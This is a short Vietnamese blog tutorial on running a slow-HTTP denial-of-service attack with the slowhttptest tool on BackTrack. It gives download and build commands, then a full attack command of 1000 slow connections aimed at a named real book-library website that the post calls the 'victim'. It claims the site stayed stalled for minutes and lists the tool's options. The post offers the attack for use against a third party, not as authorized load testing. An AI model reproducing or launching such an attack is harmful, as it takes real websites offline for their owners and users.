Thứ Sáu, 8 tháng 3, 2013

DDOS dùng backtrack với slowhttptest

Đây là một ví dụ đơn giản về ddos nhé.

đầu tiên down gói slowhttptest về nhé,rồi giải nén ra và vào thư mục chưa file chạy như sau


wget http://slowhttptest.googlecode.com/files/slowhttptest-1.1.tar.gz
gunzip slowhttptest-1.1.tar.gz
tar xf slowhttptest-1.1.tar
cd slowhttptest-1.1

Chạy nó 
./configure
make
make install


sau khi chạy xong thì ta gõ lệnh sau ,mình lấy ví dụ 1 thằng nhé 
victim của chúng ta là http://idoc.vn/ - một trang về thư viện sách chẳng hạn
---> ta thấy trang vẫn vào đc.
thực hiện gửi request nào
slowhttptest -c 1000 -B -g -i 1 -r 300 -s 10240 -u http://idoc.vn/ -x 20và xem kết quả ta nhận đc là gì nào 


nó cứ đang kết nối đến tận 5 phút rồi 


chú ý các option dùng trong đó là:
-a start start value of ranges-specifier for range header test
-b bytes limit of range-specifier for range header test
-c number of connections limited to 1024
-H, B, or R specify to slow down in headers section or in message body.
            -R enables range test
-g generate statistics in CSV and HTML formats, pattern is slow_xxx.csv/html,
   where xxx is the time and date
-i seconds interval between follow up data in seconds, per connection
-l seconds test duration in seconds
-o file custom output file path and/or name, effective if -g is specified
-r connections per second connection rate
-s bytes value of Content-Length header, if -B specified
-t verb custom verb to use
-u URL target URL, the same format you type in browser, e.g https://host:port/
-v level verbosity level of log 0-4
-x bytes max length of follow up data


oki nhé.tut by capuchino.Không có nhận xét nào:

Đăng nhận xét